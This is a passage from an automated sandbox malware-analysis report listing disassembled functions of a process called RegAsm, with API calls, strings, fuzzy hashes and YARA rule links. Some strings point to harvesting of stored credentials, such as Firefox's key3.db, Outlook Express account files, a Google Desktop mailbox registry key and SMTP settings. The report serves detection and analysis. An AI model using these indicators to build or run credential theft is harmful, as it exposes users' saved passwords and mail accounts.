                                                                                                                                                                                                                        • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                                                                                                                                        • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                                                        • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                                                        • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                                                        • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                                                      • SetCursor.USER32 ref: 0040B9F9
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0040BA0B
                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2374668499-0
                                                                                                                                                                                                                      • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                                                                                                                      • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                                                                                                                                                      Function 0040AD38 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040AD5B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040AD71
                                                                                                                                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                                                        • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                                                        • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040ADA8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                                                                                                                                                                                      • <%s>, xrefs: 0040ADA2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                                                      • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                      • API String ID: 3699762281-1998499579
                                                                                                                                                                                                                      • Opcode ID: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                                                                                                                                                      • Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
                                                                                                                                                                                                                      Function 00409A32 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: 719bf35f5edd6f743f398197aebabc3c3e3d79d9cb1a1b13ae007a7bface88c2
                                                                                                                                                                                                                      • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 719bf35f5edd6f743f398197aebabc3c3e3d79d9cb1a1b13ae007a7bface88c2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                                                                                                                                                                      Function 00409A98 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                                                                                                                                                      • free.MSVCRT ref: 00409B00
                                                                                                                                                                                                                        • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@$free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2241099983-0
                                                                                                                                                                                                                      • Opcode ID: 15a481c8f84ee3b442f71837438c05ceab47f4c823323df975f811a14ab91f85
                                                                                                                                                                                                                      • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15a481c8f84ee3b442f71837438c05ceab47f4c823323df975f811a14ab91f85
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                                                                                                                                                                                      Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                                                                                                                        • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                                                                                                                        • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                                                                                                                      • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                                                                                                                      • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2775283111-0
                                                                                                                                                                                                                      • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                                                      • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                                                                                                                                      Function 00405F53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • BeginDeferWindowPos.USER32(0000000A), ref: 00405F6C
                                                                                                                                                                                                                        • Part of subcall function 004015F4: GetDlgItem.USER32(?,?), ref: 00401604
                                                                                                                                                                                                                        • Part of subcall function 004015F4: GetClientRect.USER32(?,?), ref: 00401616
                                                                                                                                                                                                                        • Part of subcall function 004015F4: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401680
                                                                                                                                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0040602B
                                                                                                                                                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 00406036
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                                                                      • String ID: $
                                                                                                                                                                                                                      • API String ID: 2498372239-3993045852
                                                                                                                                                                                                                      • Opcode ID: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
                                                                                                                                                                                                                      • Instruction ID: a7623898fd9bb087a7334f25a668ee6c33d9336bc772a6b4061b4b4824447eab
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7317070640259FFEB229B52CC89DAF3E7CEBC5B98F10402DF401792A1CA794F11E669
                                                                                                                                                                                                                      Function 0041479C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                      • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                                                                                                                      • API String ID: 885266447-2471937615
                                                                                                                                                                                                                      • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                                                                                                                      • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                                                                                                                                                      Function 00406AC7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00406B11
                                                                                                                                                                                                                        • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                                                                                                                                                        • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT ref: 00407917
                                                                                                                                                                                                                        • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                      • String ID: Ul@$key3.db
                                                                                                                                                                                                                      • API String ID: 1968906679-1563549157
                                                                                                                                                                                                                      • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                                                                                                                      • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                                                                                                                                                                                      Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strcmpi$_mbscpy
                                                                                                                                                                                                                      • String ID: smtp
                                                                                                                                                                                                                      • API String ID: 2625860049-60245459
                                                                                                                                                                                                                      • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                                                                                                                                      • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                                                                                                                      Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408258
                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close$EnumOpenmemset
                                                                                                                                                                                                                      • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                                                                                      • API String ID: 2255314230-2212045309
                                                                                                                                                                                                                      • Opcode ID: bd388eefff722b401c994613a19154ddee7b9885900c8831656236c5d79d68fa
                                                                                                                                                                                                                      • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd388eefff722b401c994613a19154ddee7b9885900c8831656236c5d79d68fa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                                                                                                                                      Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C28C
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0040C314
                                                                                                                                                                                                                        • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FocusMessagePostmemset
                                                                                                                                                                                                                      • String ID: S_@$l
                                                                                                                                                                                                                      • API String ID: 3436799508-4018740455
                                                                                                                                                                                                                      • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                                                                                                                                      • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                                                                                                                      Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004092C0
                                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                                                                                                      • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                                                                                                                                                      • API String ID: 408644273-3424043681
                                                                                                                                                                                                                      • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                                                                                                                      • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                                                                                                                                                      Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy
                                                                                                                                                                                                                      • String ID: C^@$X$ini
                                                                                                                                                                                                                      • API String ID: 714388716-917056472
                                                                                                                                                                                                                      • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                                                      • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                                                                                                                      Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                                                                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                      • String ID: MS Sans Serif
                                                                                                                                                                                                                      • API String ID: 3492281209-168460110
                                                                                                                                                                                                                      • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                                                                                                                      • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                                                                                                                      Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClassName_strcmpimemset
                                                                                                                                                                                                                      • String ID: edit
                                                                                                                                                                                                                      • API String ID: 275601554-2167791130
                                                                                                                                                                                                                      • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                                                                                                                                      • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                                                                                                                      Function 00410F99 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00410FA2
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00410FC8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$FreeLoad
                                                                                                                                                                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                      • API String ID: 534179979-1506664499
                                                                                                                                                                                                                      • Opcode ID: abe26a1acc7de01d0fbbea04bf45f8b750203d7cb8a5a0f94c9348c994a43a28
                                                                                                                                                                                                                      • Instruction ID: 0aecfb21e5a5e73b57ea68f7d566dfb4b74aadbd5913b1eaff8a54c705ff6fdb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abe26a1acc7de01d0fbbea04bf45f8b750203d7cb8a5a0f94c9348c994a43a28
